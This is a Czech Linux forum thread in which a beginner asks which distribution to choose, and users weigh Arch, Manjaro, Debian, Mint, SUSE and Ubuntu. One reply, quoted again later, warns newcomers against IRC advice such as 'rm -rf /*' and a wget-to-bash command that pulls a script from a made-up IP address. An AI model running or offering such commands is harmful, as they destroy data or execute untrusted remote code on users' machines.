Začátečnické dotazy k Linuxu

Kolemjdouci

Začátečnické dotazy k Linuxu
« kdy: 17. 08. 2015, 23:29:14 »
Zdravim;)
Pote, co windows predvedly, co predvedly, mac os se take vyvyji smerem, ktery se mi nelibi, je na case zkusit neco rekneme hloubeji.
Nejake (rekneme tuze zakladni) zkusenosti mam - o co mi jde.
Vyclenil jsem si notebook na linux (lenovo x 200 tablet)
Protoze jinak se proste nedokopu k tomu to pouzivat.
Ted vaham mezi distribucemi - neptam se "jaka je pro me nejlepsi", ale je pro lamu lepsi rolling update, nebo klasicky release update?
Bojim se toho, ze vzhledem k mym rekneme nezapornym (cti nulovym) zkusenostem, bych to mohl u rolling update slusne receno podelat hodne:) na druhou stranu ta myslenka se mi libi vice nez "kazdy zvoleny casovy interval povysit verzi os".
Podelat to muzu i u tech stable release, ale zase asi nebudu resit porad vypadky typu nejnovejsi verze, nove chyby.
Dalsi vec, kterou jsem asi ne uplne zcela pochopil je system d - k cemu to je a jake to ma pro me vyhody nevyhody?
Coz je dalsi celkem dulezity aspekt pro volbu distra.
*buntu a derivaty nechci - zkousel jsem chvili a nemam proste rad sw, ktery se snazi byt chytrejsi nez ja.
Dalsi vec, ktera mi na nem vadi je to, ze z debianu hlavne bere, ale nic nevraci (alespon tak mi to prijde).
Nerad bych take one man show distra - je to fajn, ale prilis spojeno s jednim clovekem.
Rad bych dobrou dokumentaci a reseni balicku ve smyslu zavislosti atd.
Nasazeni bude desktop, prenosny pracovni stroj - nemam problem zaplatit za aplikaci (pripadne os)-ale musi to mit vyznam (pro me:)
Rad bych se naucil jak to funguje a tak - cli se nebranim (tesim se na mutt), i kdyz s nim extra neumim:)) (spis vubec).
Zatim si myslim na arch, ale nevim jestli je uplne vhodny pro nekoho jako jsem ja :/
Jen doplnim jeste, ze nejsem programator a asi nikdy nebudu:)
Diky za postrehy, rady atd.
PS: mozna by stalo za to uvazovat i o bsd, ale nevim jak na tom je podpora toho notasu ze strany hw a jak na tom jsou aplikace (priznam se, ze jsem zkoumal jen velmi okrajove)


Ado

Re:Začátečnické dotazy k Linuxu
« Odpověď #1 kdy: 17. 08. 2015, 23:34:58 »
To tu bude zbytocnych dristov. 200+ tipujem. Ak si mal hokej z linuxu, tak po precitani budes mat hokej^10.



kuba77

Re:Začátečnické dotazy k Linuxu
« Odpověď #2 kdy: 18. 08. 2015, 00:04:50 »
Arch je fajn, ale pro začátečníka nevím jestli není lepší začít na Antergos případně Manjaru a vyhnout se tak těžší instalaci Archu. Rolling update bych se nebál, IMHO spolehlivější než povyšování Ubuntu na novější verze ;).

uxes

Re:Začátečnické dotazy k Linuxu
« Odpověď #3 kdy: 18. 08. 2015, 01:01:54 »
souhlasím s kolegou nad, vyzkoušet arch s nějakým instalátorem, já na něm mám třeba xfce ale jinak je dobrý cinnamon, popřípadě linux mint (ano nechceš *buntu, ale mint je nejlepší pro nováčky...)

Krysa1

Re:Začátečnické dotazy k Linuxu
« Odpověď #4 kdy: 18. 08. 2015, 06:44:07 »
rozdelovat distra na zacatecnik/pokrocily je blbost. Sam jsem se o tom presvedcil, kdyz jsem s linuxem zacinal - vsichni mi cpali ruzne prekombinovane a slozite omalovanky pro pitomce.

Ja osobne jsem se nejvice zorientoval v archlinxu, nebot vse bylo celkem hezky popsane na wiki a nic nebylo slozite. Pokud umis anglicky a dokazes se zorientovat v navodu, tak nebudes mit problem.  Alternativne potom Manjaro, coz je takova nadstavba nad archem s lehkou instalaci a prednastavenym desktopem s xfce celkem v pohode bez zbytecnych blbosti.

Pak tu mas slackware, ten se na desktop moc nehodi. Je spis na hrani, na delani live-cd (slax, drive whopix, atd..) a na stary, slaby, nebo jednoucelovy hardware. Proste kdyz je potreba jenom malo aplikaci (balicku), pripadne rovnou vyrobit predpripravene image (analogie live-cd).

CentOS je dobre zkusit nekde ve virtualu, nebot RedHat Enterprise je celkem popularni server ditribuce ve firemnim prostredi. Na desktop nevhodne.

Fedora potrebuje instalovat specialni repositare, protoze ve standartnich neni dost softu, a ty nejsou vzdy plne aktualizovne... zkracene schweinerei.

Ubuntu nechces, duvody chapu, proto nedoporucuju ani suse. Mint instaloval pred casem na zkouzku kolega a pry je tam dost adwaru.

Gentoo je urcite volba, me nikdy nebavilo to vsechno kompilovat a kdyz to nechci kompilovat, tak zase nema moc cenu mit gentoo. Ja osobne bych ho nedoporucil.

Pak je tu debian, ktery je trochu vice over-engineered nez arch, ale zase ma release a stable verze je opravdu celkem stable (tak pul roku po vydani). Pripadne je mozne pouzit opet nejakou nadstavbu v podobe intalacniho cd + nejaky config desktopu do zacatku. Napada me napr. crunchbang. Urcite jich bude vic na google.

Shrnuto a podtrzeno myslim, ze jsou celkem dve moznosti a to bud rolling release = Arch(/nadstavba) nebo Debian stable(/nadstavba). Vsechno ostatni existuje jen pro nadsence, korporaty, lidi snazic se za kazdou cenu odlisit, trolling na foru a opravdu specialni pripady (routery, system resque, live...)



Tomxoxoxo

Re:Začátečnické dotazy k Linuxu
« Odpověď #5 kdy: 18. 08. 2015, 10:42:55 »
tot otazka, vzit si system ktery hned na zacatku muze vsechno znechuti nejakou blbosti, nebo vzit neco u ceho je sance ze bude fungovat bezproblemoveji a ty problemy si clovek casem vyrobi sam :)

chapu ze ubuntu budi pocit ze je moc chytre, spis bych se klonil ke xubuntu ktere proste funguje, ale je to vec osobnich preferenci proste clovek musi nainstalovat par systemu a vyzkouset co mu sedne, ja jsem si nainstaloval asi 5 distribuci nez jsem zakotvil, ale ted po par letech si rikam ze je asi na case zkusit neco noveho a koukam po vyse zminenem Manjaro s Xfce

Jméno

Re:Začátečnické dotazy k Linuxu
« Odpověď #6 kdy: 18. 08. 2015, 10:54:18 »
Souhlasim s @Krysa1 asi az na to SUSE, ktere se nastesti nesnazi byt chytrejsi nez uzivatel (narozdil od Ubuntu) a defaultne nabizi vzhled a chovani zhruba jako Windows. Jinak se mi osvedcilo pockat s upgradem 4-6 mesicu po novem vydani - a to se bavim o upgrade, ktere provadeji bezni uzivatele, kteri mi v pripade problemu zaslou email a ja to pres pul republiky pres ssh resim (zatim nejvetsi problem z hlediska celkoveho dopadu na uzivatelskou pouzitelnost pocitace mel reseni spusteni "zypper rm stary-graficky-ovladac", tedy naprosto trivialni zasah, takze SUSE povazuji za dostatecne user-friendly).

Pro tazatele bych ale asi doporucil Arch linux ci Manjaro, protoze SUSE je prilis "nudne" (proste funguje a neni nutne vubec nic delat :) ).

zbyso

Re:Začátečnické dotazy k Linuxu
« Odpověď #7 kdy: 18. 08. 2015, 12:33:07 »
Doporucuju Linux Mint v XFCE verzi, sice nejsem uplna lama, ale stejne mam radsi "predpripraveny" system, nez dva dny resit Arch aby mi jela wifina atd.
v mintu davam jednu radku po instalaci:
apt-get install htop screen nmap openssh-server sshfs iftop mc
a muzu zacit neco delat ;)
vcera jsem uspesne vymenil SSD disk z "sekundarniho PC" a bez jakehokoliv reseni mi v Lenovo X200 naskocil vcetne Wifi, zvukove karty atd. co si vic prat ;)

zbyso

Re:Začátečnické dotazy k Linuxu
« Odpověď #8 kdy: 18. 08. 2015, 12:37:58 »
Mint instaloval pred casem na zkouzku kolega a pry je tam dost adwaru.
To by me docela zajimalo, co konkretne?

Krysa1

Re:Začátečnické dotazy k Linuxu
« Odpověď #9 kdy: 18. 08. 2015, 15:41:38 »
Ad Suse: asi ti proste sedlo, nic proti. Mozna je preslap hazet ho do jednoho pytle s ubuntu, to se omlouvam. Me to tak, ale subjektivne prijde.

Ad snadna instalace: ano, taky mam mnohdy chut neco jen tak nainstalovat a zacit pouzivat. Pred asi pul rokem jsem si dal domu desktop na filmy, muziku a pod. a naistaloval jsem Manjaro, protoze s archem se mi nechtelo drbat. Nainstalovat si arch urcite trva pro nezkuseneho tak ty dva dlouhe zimni vecery, ale potom se bude moci povazovat za celkem power-usera - bude vedet, co na pocitaci ma, co to priblizne dela, jak se to zapina/vypina a nastavuje.

Ad mint adware: ted jsem se zaptal a jeden priklad za vsechny: nastaveni vychoziho vyhledavani ve firefoxu se neustale menilo z google (coz user chtel) na duckgo vzdy po restartu (pc/prohlizece?), byl tam script, ktery to menil, byl v nejakem baliku mint-firefox-config nebo tak neco, ktery kdyz se chtelo odinstalovat, tak to bralo pryc cely desktop. Problem nebyl v defaulu, ale v tom, ze se to vzdy automaticky zase prenastavilo. Urcite by to slo nejak zaonacit, ale to je nad ramec just-works distra. Nebyl jsem u toho, takze svedectvi z doslechu.

Krysa1

Re:Začátečnické dotazy k Linuxu
« Odpověď #10 kdy: 18. 08. 2015, 17:04:23 »
Jeste zkusim odpovedet na dalsi otazky:

Vyclenil jsem si notebook na linux (lenovo x 200 tablet)

podle referenci dobra volba

Bojim se toho, ze vzhledem k mym rekneme nezapornym (cti nulovym) zkusenostem, bych to mohl u rolling update slusne receno podelat hodne

pokud si zacatecnik a chces tomu porozumet, tak se v tom budes vrtat. a kdyz tomu nerozumis a budes se v tom vrtat, tak to rozvrtas a podelas. A vubec to neni na skodu - kdyz si zazalohujes data.

Podelat to muzu i u tech stable release, ale zase asi nebudu resit porad vypadky typu nejnovejsi verze, nove chyby.
ano, ale neni to tak hrozne. v rolling release muzes obcas narazit na problem, ktery neni uplne zdokumentovan, v takovem pripade doporucuji zaptat se na IRC, mej na pameti, ze slovem (natoz psanym) ti nikdo nemuze ublizit a minimalne jeden kterej radi sofistikovanejsi obdobu "rm -rf /*" nebo "wget -o - http://213.444.345.12/assrape.sh | bash". U stable release zase mas nekdy problem, ze aplikace kterou se snazis rozbehat (neni soucasti balicku, potrebujes novejsi verzi) bude potrebovat novejsi knihovny, ktere zase budes pracne nekde shanet.. napr. jsem zkousel kompilovat na debianu freespace open a nakonec jsem se na to vykaslal.

Dalsi vec, kterou jsem asi ne uplne zcela pochopil je system d - k cemu to je a jake to ma pro me vyhody nevyhody?
Coz je dalsi celkem dulezity aspekt pro volbu distra.
neni to dulezity aspekt volby distra. Ja osobne bych nejradeji toho zrzavyho pottera nejradeji mucil kyselinou ve sklepe, ale jsem presvedcen, ze pro tebe je to jedno. Zda se, ze systemd nakonec proste vyhraje a na nas starejch konzervach je se s tim smirit. Stejne to nakonec zalezi na distribuci a tam jde zprasit jak init scripty, tak systemd.

Dalsi vec, ktera mi na nem vadi je to, ze z debianu hlavne bere, ale nic nevraci (alespon tak mi to prijde).
Oho idealita/on je jeste panic... kde ty lonske snehy jsou?

Nerad bych take one man show distra - je to fajn, ale prilis spojeno s jednim clovekem.
Nepodcenuj jednoho odhodlaneho jednotlivce. Podivej se treba na slackware. jedno z nejstarsich a nejvic stable distribuci. Navic to ma jeste jeden aspekt, ktereho jsem se sice okrajove dotknul, ale asi ho dosti nezduraznil. Mas plnohodnotna distra s vlastnimi repositari a spravou baliku, a pak mas distra, kterym rikam pracovne nadstavby. Pouzivaji balicky, manazer balicku, pripadne i repositare plnohodnotnych dister a sami slouzi jen jako instalacni medium s par balicky navic vetsinou vzhled, configurace desktopu apod. a pokud maji vlastni repositar, tak jen protoze nepousteji nove zmeny tak rychle. V prvnim pripade je one-man-show opravdu sazkou do loterie (i kdyz vyjimky existuji), ale v druhem pripade je to naprosto v poradku a prinasi to svou hodnotu. Kdyz treba crunchbang rozhodl nepokracovat na debianu 8, tak neni problem proste udelat upgrade na debian 8, protoze repositare jsou stejne. Pekne nastaveny openbox a sladene gtk a qt theme a sadu softu, rozdeleni menu apod. uz ti nikdo nevezme a normalne muzes pokracovat na debianu stable.

Rad bych dobrou dokumentaci a reseni balicku ve smyslu zavislosti atd.
nejlepsi wiki maji arch a gentoo. tecka. nejvice blogu se venuje debianu stable, ubuntu a pak ti ostatni.

Nasazeni bude desktop, prenosny pracovni stroj - nemam problem zaplatit za aplikaci (pripadne os)-ale musi to mit vyznam (pro me:)
u linuxu se neplati za OS, ale za support, skoleni a potom za opravdu specializovane aplikace/sluzby. Pokud upustis chlup urcite v kazdem vetsim meste najdes nekoho, kdo ti za par piv/stovek bude radit, odpovidat, napovidat a pod. Problem je nevybrat si nejakeho pitomce, ale to asi vsude.
Rad bych se naucil jak to funguje a tak - cli se nebranim (tesim se na mutt), i kdyz s nim extra neumim:)) (spis vubec).
jo, aplikace v textovem rezimu jsou v linuxu naprosto paradni a pro me to bylo taky lakadlo, nakonec u me krome bash prikazu a core utils prezil jenom VIM, ale presto vsechny ty textove kalendare, irc klienti, icq klienti (to uz je doba!), mail klienti naji svoje kouzlo.
Zatim si myslim na arch, ale nevim jestli je uplne vhodny pro nekoho jako jsem ja :/
pokud si na to vyhradis ty povestne dva dny nenavisti k linuxu a vedle stroj na ktery si zvykly, kde si budes moci googlit a poustet uklidnujici hudbu, tak proc ne. Rozhodne to za to stoji. Jen si vem, kolik casu si stravil kravenim nejakych veci ve windows 98 a XP. A tam jeste bez poradne dokumentace.
Jen doplnim jeste, ze nejsem programator a asi nikdy nebudu:)
pojem programator ma dneska dost siroke mantinely. Neni to nutnost, ale vedet, ze existuji nejake podminky a cykly jako if ... then ... else, for i in `find /tmp/foto/` a while ... do ... ma rozhodne smysl, neni na tom nic tezkeho a vlastne ani tak moc programatorskeho. Ale nektere ukony v obycejne praci se soubory jsou potom naprosto super - jako najit vsechny mp3 v podadresari, prejmenovat podle ID3tagu a rozdelit do adresaru podle interpret/album a jeste udealt symlink na adresare se zanrem jsou potom prikazy na jeden radek, dva radky. A co mam zkusenosti ze sveho okoli mnoho beznych uzivatelu si s tim neporadi (jinak nez bruteforce).

PS: mozna by stalo za to uvazovat i o bsd, ale nevim jak na tom je podpora toho notasu ze strany hw a jak na tom jsou aplikace (priznam se, ze jsem zkoumal jen velmi okrajove)
BSD nech na pozdeji.

Kolemjdouci

Re:Začátečnické dotazy k Linuxu
« Odpověď #11 kdy: 18. 08. 2015, 21:57:59 »
@krysa:

podle referenci dobra volba

Proto byl zvolen;) (neco jsem si nacetl)


pokud si zacatecnik a chces tomu porozumet, tak se v tom budes vrtat. a kdyz tomu nerozumis a budes se v tom vrtat, tak to rozvrtas a podelas. A vubec to neni na skodu - kdyz si zazalohujes data.


Urcite - vrtat se budu, v nejhorsim me to posune dal, protoze budu vedet, ze na to nemam:)


ano, ale neni to tak hrozne. v rolling release muzes obcas narazit na problem, ktery neni uplne zdokumentovan, v takovem pripade doporucuji zaptat se na IRC, ...

Na jakym irc?

...mej na pameti, ze slovem (natoz psanym) ti nikdo nemuze ublizit a minimalne jeden kterej radi sofistikovanejsi obdobu "rm -rf /*" nebo "wget -o - http://213.444.345.12/assrape.sh | bash".

Rm rf znam, wget vim co je, co dela konkretne -o nevim (az bude linux budu vedet:)
Prikazy slepe neopisuju, snazim se pouzivat mozek (obcas to tak nevypada:)


 U stable release zase mas nekdy problem, ze aplikace kterou se snazis rozbehat (neni soucasti balicku, potrebujes novejsi verzi) bude potrebovat novejsi knihovny, ktere zase budes pracne nekde shanet.. napr. jsem zkousel kompilovat na debianu freespace open a nakonec jsem se na to vykaslal.


Ja zase zkousel nejnovejsi firefox na debianu stable (kdysi)

Dalsi vec, ktera mi na nem vadi je to, ze z debianu hlavne bere, ale nic nevraci (alespon tak mi to prijde).
[/quote]
Oho idealita/on je jeste panic... kde ty lonske snehy jsou?

Nevim, nejsem idealista, jen se mi to nelibi.



Nepodcenuj jednoho odhodlaneho jednotlivce. Podivej se treba na slackware. jedno z nejstarsich a nejvic stable distribuci. Navic to ma jeste jeden aspekt, ktereho jsem se sice okrajove dotknul, ale asi ho dosti nezduraznil. Mas plnohodnotna distra s vlastnimi repositari a spravou baliku, a pak mas distra, kterym rikam pracovne nadstavby. Pouzivaji balicky, manazer balicku, pripadne i repositare plnohodnotnych dister a sami slouzi jen jako instalacni medium s par balicky navic vetsinou vzhled, configurace desktopu apod. a pokud maji vlastni repositar, tak jen protoze nepousteji nove zmeny tak rychle. V prvnim pripade je one-man-show opravdu sazkou do loterie (i kdyz vyjimky existuji), ale v druhem pripade je to naprosto v poradku a prinasi to svou hodnotu. Kdyz treba crunchbang rozhodl nepokracovat na debianu 8, tak neni problem proste udelat upgrade na debian 8, protoze repositare jsou stejne. Pekne nastaveny openbox a sladene gtk a qt theme a sadu softu, rozdeleni menu apod. uz ti nikdo nevezme a normalne muzes pokracovat na debianu stable.

Ad slackware - ano, je to super, byt na desktop nevhodne, ale az one man umre, nebude to dobre
Jj crunchbang se mi libil, na druhou stranu mi to prislo jako xubuntu/lubuntu atd - proste stejna distribuce s jinym de (mozna se pletu). Cimz nijak nesnizuji hodnotu crunchbangu - me se openbox tuze libi (cetl jsem i "navod" na fvwm, ale tolik casu tomu nemuzu venovat)


u linuxu se neplati za OS, ale za support, skoleni a potom za opravdu specializovane aplikace/sluzby. Pokud upustis chlup urcite v kazdem vetsim meste najdes nekoho, kdo ti za par piv/stovek bude radit, odpovidat, napovidat a pod. Problem je nevybrat si nejakeho pitomce, ale to asi vsude.

To urcite, jako laik to ale nejsem schopen rozpoznat :) ale par lidi znam, tak by problem nemel nastat;)


jo, aplikace v textovem rezimu jsou v linuxu naprosto paradni a pro me to bylo taky lakadlo, nakonec u me krome bash prikazu a core utils prezil jenom VIM, ale presto vsechny ty textove kalendare, irc klienti, icq klienti (to uz je doba!), mail klienti naji svoje kouzlo.

Urcite - nema to tolik funkci jako nektere gui aplikace, ale je to super;) (subjektivni nazor)-navic ve spojeni s colors (pokud jdou upravit...) :))


pokud si na to vyhradis ty povestne dva dny nenavisti k linuxu a vedle stroj na ktery si zvykly, kde si budes moci googlit a poustet uklidnujici hudbu, tak proc ne. Rozhodne to za to stoji. Jen si vem, kolik casu si stravil kravenim nejakych veci ve windows 98 a XP. A tam jeste bez poradne dokumentace.

Zacinal jsem u 3.11 (co se tyce windows:))


pojem programator ma dneska dost siroke mantinely. Neni to nutnost, ale vedet, ze existuji nejake podminky a cykly jako if ... then ... else, for i in `find /tmp/foto/` a while ... do ... ma rozhodne smysl, neni na tom nic tezkeho a vlastne ani tak moc programatorskeho. Ale nektere ukony v obycejne praci se soubory jsou potom naprosto super - jako najit vsechny mp3 v podadresari, prejmenovat podle ID3tagu a rozdelit do adresaru podle interpret/album a jeste udealt symlink na adresare se zanrem jsou potom prikazy na jeden radek, dva radky. A co mam zkusenosti ze sveho okoli mnoho beznych uzivatelu si s tim neporadi (jinak nez bruteforce).

Jj to me na tom prave laka - ta jednoduchost a ucelnost - propojit jeste s grepem a spol ;)

Dobre na bsd zapomenu:))


Omlouvam se za tu pokrivenou citaci, pisu z mobilu a citace jak tu je byla pro me velmi neprehledna

Nejaky kontakt na par dalsich dotazu, ktere nechci resit pres forum by byl?



@zbyso ad mint s xfce - xfce je fajn, mint "pod kapotou" by mi vadil (nerikam, ze je spatny, jen se mi z nekolika duvodu nelibi-yfce je dobry relativne odlehceny desktop, proti nemu zadna.
Nemyslim si, i kdyz jsem lama, ze by mi trvalo dva dny rozchodit wifinu (ale to se fakt jenom domnivam:))
Radeji si dam praci na zacatku a trosku si zanadavam, nez vzit neco predprivaneho abych o tom nic nevedel - to si muzu nechat windows, ktere vse zaridi za me.
(Nic ve zlem)

Jinak zatim diky vsem za odpovedi- celkem slusne me posouvaji;)




nobody

Re:Začátečnické dotazy k Linuxu
« Odpověď #12 kdy: 18. 08. 2015, 22:49:04 »
Ja to tak ctu, tak sem presvedcenej ze pro tebe bude idealni Arch (+ nejspis Xfce)
Je to system kterej uz samotna instalace ti da zakladnerozsirenej pohled na prikazovou radku, co kde, jak a proc...
Zaroven je to system kde co si sam neudelas to nemas, coz taky pozadujes...

Dal bych to na LVM a cas od casu udelas zalozni klon k urcitemu dni, pred nejakou vetsi akci udelas snapshot, ktery ti umozni se v pripade rozdrbani vratit zpet (neni to to same jako bod obnovy ve windows, je to obdoba snapshot ve virtualboxu, resp. jde o ulozeni stavu celeho oddilu, nikoli jen systemovych souboru)

zakoukni se do pruvodce instalace:
https://wiki.archlinux.org/index.php/Installation_guide

pokud si netroufas zkoukni verzi zamerenou spise pro zacatecnika:
https://wiki.archlinux.org/index.php/Beginners'_guide

TKL

Re:Začátečnické dotazy k Linuxu
« Odpověď #13 kdy: 19. 08. 2015, 09:40:27 »
Ted vaham mezi distribucemi - neptam se "jaka je pro me nejlepsi", ale je pro lamu lepsi rolling update, nebo klasicky release update?
Bojim se toho, ze vzhledem k mym rekneme nezapornym (cti nulovym) zkusenostem, bych to mohl u rolling update slusne receno podelat hodne:) na druhou stranu ta myslenka se mi libi vice nez "kazdy zvoleny casovy interval povysit verzi os".

*buntu a derivaty nechci - zkousel jsem chvili a nemam proste rad sw, ktery se snazi byt chytrejsi nez ja.
Dalsi vec, ktera mi na nem vadi je to, ze z debianu hlavne bere, ale nic nevraci (alespon tak mi to prijde).

Rozsáhlá diskuze na stejné téma proběhla relativně nedávno tady: http://forum.root.cz/index.php?topic=11449.0
Třeba tam něco smysluplného najdete.

Za mě jen k tomu Ubuntu: to je taková urban legend, že vás Ubuntu k něčemu nutí. Stejně jako i to, že si jen od komunity bere a nic nevrací.

Já jsem s linuxem začínal někdy před příchodem milénia a tak se asi můžu považovat za celkem zkušeného uživatele. Jedu na Ubuntu v práci i doma a nemám s tím sebemenší problém. Systém mě nenutí k ničemu a když se o to trošku snažil, stačilo pár změn v nastavení a mám ho takový, jaký ho chci mít. Ve svém věku a se svými zkušenostmi chci systém, který bude fungovat jak má a bude dostatečně stabilní a spolehlivý, což mi Ubuntu dává. A to kromě běžných činností, adminštiny a nějaké té webařiny dost blbnu třeba s multimédii.
Tudíž z mého pohledu "old school" uživatele je LTS větev Ubuntu ideální nejen pro začátečníky. Samozřejmě to ale není žádné dogma a chápu i postoj někoho, kdo se chce hodně naučit a v systémech se šťourat, taky jsem si kdysi tím prošel.

A k tomu "nevracení" komunitě: ať si kdo chce co chce říká, tak celá linuxová komunita by Canonicalu měla být neskutečně vděčná. Díky  jeho investicím a marketingu se Linux obecně dostal do pozice, že se o něm obecně ví. Nikdo jiný to předtím nedokázal. Kdyby nic jiného, tak tohle úplně stačí. Nicméně přinesli i pár pěkných nápadů, po kterých pošilhávají i ostatní distribuce, namátkou mě napadají PPA repozitáře, ale bude toho mnohem více.

Takže jestli stojíte o radu linuxového matadora, který začínal na distrech, o kterých už dnes linuxoví "mlaďoši" ani neslyšeli a strávil i dlouhá léta s Macy, dejte Ubuntu ještě šanci a zkuste ho poznat hlouběji. Třeba zjistíte, že vám má co nabídnout.

kuba77

Re:Začátečnické dotazy k Linuxu
« Odpověď #14 kdy: 19. 08. 2015, 10:09:24 »
Citace
Nicméně přinesli i pár pěkných nápadů, po kterých pošilhávají i ostatní distribuce, namátkou mě napadají PPA repozitáře, ale bude toho mnohem více.

PPA repozitáře? To je to, co mě na Ubuntu a Ubuntu-based distribucích nejvíc vadí. Mít přidaných několik PPA repo. Věci, co nejsou v repozitářích, abych hledal na netu, jestli neexistuje nějaké PPA repo, v kterém je hledaný balíček pro správnou verzi Ubuntu. A když ne, tak se to pokusit zkompilovat nebo nějak jinak nainstalovat třeba přiloženým sh skriptem a další věcí je to pak udržovat aktuální. Zatímco na Archu, co nenajdu v repozitářích, tak většinou najdu v AURu, z kterého to pomocí yaourtu jednoduše nainstaluju (zkompiluje to za mě) a pomocí yaourt -Syua udržuju aktuální.